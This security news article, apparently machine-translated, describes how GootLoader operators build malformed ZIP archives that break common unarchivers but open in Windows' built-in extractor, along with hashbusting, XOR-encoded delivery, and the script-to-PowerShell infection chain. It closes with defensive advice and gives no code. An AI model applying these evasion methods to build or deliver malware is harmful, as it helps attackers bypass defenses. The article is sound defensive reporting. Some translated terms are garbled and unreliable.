GootLoader and the malformed ZIP: the technique that evades analysis and opens the door to malware on Windows

The name GootLoader has long been around the most persistent malware incidents: it is not a ransomware by itself, but a charger - a loader - that specializes in opening the door for more dangerous threats. Recent investigations have found that their operators have refined their tricks to get away with them in front of regular automatic detectors and analysis tools. Instead of relying only on code ofuscation, they are exploiting the peculiarities of the ZIP format and the Windows ecosystem to ensure that the end victim can execute the malicious load, while the defense systems are confused.

The most striking technique reported by the Expel security firm is to create intentionally "malformed" ZIP files. Instead of a standard ZIP file, attackers concatenate hundreds - between 500 and 1,000 - of subarctives and manipulate central catalog fields and other metadata to cause errors in regular decompressors such as 7-Zip or WinRAR. However, curiously, the Windows integrated extractor is often able to open those files. The result is perverse: most automatic analysis tools cannot process the ZIP, but an unprevented user who double-click it on a Windows computer can access its content and run malware.

To understand why that trick works, you have to look at two technical aspects. First, the attackers will either truncate or alter the ZIP's End of Central Directory (EOCD) record, an essential section for discompressors to know where the file ends and how it is structured - you can read more about that record in the ZIP format documentation in Wikipedia. Second, non-critical fields, such as disk numbers, are manipulated and random variations are introduced into metadata. These variations prevent hash signatures from being useful: each download produces a unique version of the ZIP, a technique that researchers describe as "hashbusting."

In addition, GootLoader's authors have combined this approach with other layers of evasion. Part of the ZIP file delivery can come as a XOR-encoded blob that, in the victim's browser, is decodified and concentrated to a predefined size; this prevents network security controls from directly detecting a ZIP transmission. Recent campaigns have also added custom WOFF2 sources that alter the representation of file names to camouflage their purpose, and mechanisms that abuse the WordPress comment endpoint ("/ wp-comments-post.php") to return the file when the user press a "Download" button on a compromised page.

The gears of the infection are simple and effective: the user is looking for a legal template or document - a classic SEO method poisoning and maldumping - and ends up on a compromised website that offers a ZIP. By opening it on Windows by default decompressor, the content appears as a ZIP folder in the File Explorer; if the user double-clicks a JavaScript file within the ZIP, Windows runs that script directly through wscript.exe from a temporary folder, without the file being explicitly removed to disk. From there the loader establishes persistence - for example by creating direct access (LNK) in the start folder - and launches a second script using cscript.exe that later invokes PowerShell commands to download and run additional payloads, such as information robbers or ransomware.

This mode of operation highlights an old but valid rule: modern threats combine social engineering with very technical details. A unique curious feature of the attack chain - taking advantage that the Windows extractor opens a ZIP that other tools can't - makes many automated analysis measures go through. That's why security teams should think about both how the files are delivered and what happens when a user interacts with them in the endpoint.

What practical measures can help reduce risk? From the corporate side, controls are recommended to limit the automatic execution of scripts: block or restrict the execution of wscript.exe and cscript.exe if they are not necessary for legitimate operations, and apply policies that change the way the system treats .js extensions to be opened in a text editor rather than run. Microsoft documents file association configuration options and system policies that allow to manage how specific types are opened by centralized directives ( Microsoft documentation on predetermined partnerships), and tools like AppLocker or Windows Defender Application Control can be used to prevent unauthorized execution of scripts interpreters ( AppLocker guide).

Nor should the surface that facilitates delivery be neglected: many of these campaigns depend on committed WordPress sites or SEO-manipulated pages. Keep CMS and plugins up to date, review the input points of forms and comments, and monitor suspicious redirections and external resources are measures that reduce the likelihood of a victim reaching the malicious ZIP. At the network level, controls that inspect unusual transfers or coding patterns and the protection of endpoints with behavior capabilities that do not depend on signatures alone can detect malicious behavior when a script tries to run commands or persist in the system.

The story of GootLoader is also a lesson about why security cannot be based only on hashes or static rules: the combination of unique files by malformed download and packaging makes the search for a known hash ineffective. The detection must therefore incorporate dynamic analysis, origin reputation and endpoint controls that prevent the automatic execution of potentially dangerous content. Expel, who published the detailed analysis, offers more technical context on how these malformed ZIP are built and why they are problematic for many unarchivers ( Expel report).

In the end, defense is a mixture of good digital hygiene, strict environment configuration and user training: teaching to mistrust downloads from unverified results, checking the legitimacy of sites offering legal templates and, in corporate environments, implementing policies that prevent the silent execution of scripts. The attackers will continue to seek technical and human fissures; the response must be both technical and human, combining protections in the network and endpoint with training and procedures that minimize the likelihood of dangerous interaction.